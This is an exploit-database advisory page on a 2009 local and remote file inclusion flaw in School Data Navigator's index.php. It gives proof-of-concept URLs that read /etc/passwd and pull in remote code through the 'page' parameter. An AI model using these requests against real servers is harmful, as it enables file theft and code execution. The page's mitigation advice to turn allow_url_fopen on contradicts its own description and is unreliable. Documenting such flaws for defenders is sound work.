header-logo
Suggest Exploit
vendor:
School Data Navigator
by:
br0ly
6,4
CVSS
MEDIUM
Local/Remote File Inclusion
98
CWE
Product Name: School Data Navigator
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

School Data Navigator

The variable was not declared properly in the index.php file, which allows for Local/Remote File Inclusion. If allow_url_fopen is set to on, then it allows for Remote File Inclusion, and if magic_quotes_gpc is set to off, then it allows for Local File Inclusion. The PoC for this vulnerability is http://localhost/Scripts/app_and_readme/navigator/index.php?page=/etc/passwd for LFI and http://localhost/Scripts/app_and_readme/navigator/index.php?page=[EVIL_CODE] for RFI.

Mitigation:

Ensure that the variable is declared properly and that allow_url_fopen and magic_quotes_gpc are set to on.
Source

Exploit-DB raw data:

----------------------------------------------------------------------------------------------------

  Name : School Data Navigator
  Site : http://sourceforge.net/projects/school-data-nav/
  Down : http://216.92.6.173/data_navigator/app_and_readme.zip

----------------------------------------------------------------------------------------------------

 
  Found By : br0ly
  Made in  : Brasil
  Contact  : br0ly[dot]Code[at]gmail[dot]com

----------------------------------------------------------------------------------------------------

  Description:

  Bug : Local/Remote File Inclusion
 
  Look this: index.php:48:    require($page); The variable was not declared properly.

  If allow_url_fopen=on   --> RFI;
  If magic_quotes_gpc=off --> LFI;  



----------------------------------------------------------------------------------------------------

  P0c:
 
    LFI:http://localhost/Scripts/app_and_readme/navigator/index.php?page=/etc/passwd
    RFI: http://localhost/Scripts/app_and_readme/navigator/index.php?page=[EVIL_CODE]

  OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-10]

Navigation

Suggest Exploit

Services By CQR